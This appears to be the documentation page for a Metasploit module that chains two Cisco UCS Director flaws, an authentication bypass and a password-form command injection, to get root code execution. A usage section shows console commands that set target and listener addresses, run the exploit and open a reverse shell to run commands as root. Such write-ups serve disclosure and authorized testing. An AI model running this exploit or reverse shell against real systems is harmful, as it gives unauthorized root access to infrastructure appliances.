## Introduction

The Cisco UCS Director virtual appliance contains two flaws that can be combined
and abused by an attacker to achieve remote code execution as root.

The first one, CVE-2019-1937, is an authentication bypass, that allows the
attacker to authenticate as an administrator.

The second one, CVE-2019-1936, is a command injection in a password change form,
that allows the attacker to inject commands that will execute as root.

This module combines both vulnerabilities to achieve the unauthenticated command
injection as root.
It has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
Note that Cisco also mentions in their advisory that their IMC Supervisor and
UCS Director Express are also affected by these vulnerabilities, but this module
was not tested with those products.


## Author and discoverer

Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security


## References

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj
FULL_DISC
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt


## Usage

Setup RHOST, LHOST, LPORT and run it!

```
msf5 exploit(linux/ssh/cisco_ucs_scpuser) > use exploit/linux/http/cisco_ucs_rce
msf5 exploit(linux/http/cisco_ucs_rce) > set rhost 10.9.8.121
rhost => 10.9.8.121
msf5 exploit(linux/http/cisco_ucs_rce) > set lhost 10.9.8.1
lhost => 10.9.8.1
msf5 exploit(linux/http/cisco_ucs_rce) > run

[*] Started reverse TCP handler on 10.9.8.1:4444
[+] 10.9.8.121:443 - Successfully bypassed auth and got our admin JSESSIONID cookie!
[+] 10.9.8.121:443 - Shelly is here, press ENTER to start playing with her!
[*] Command shell session 2 opened (10.9.8.1:4444 -> 10.9.8.121:34778) at 2019-08-29 22:28:01 +0700

[root@localhost inframgr]# whoami
whoami
root
[root@localhost inframgr]# ^C
Abort session 2? [y/N]  y
""

[*] 10.9.8.121 - Command shell session 2 closed.  Reason: User exit
msf5 exploit(linux/http/cisco_ucs_rce) >
```
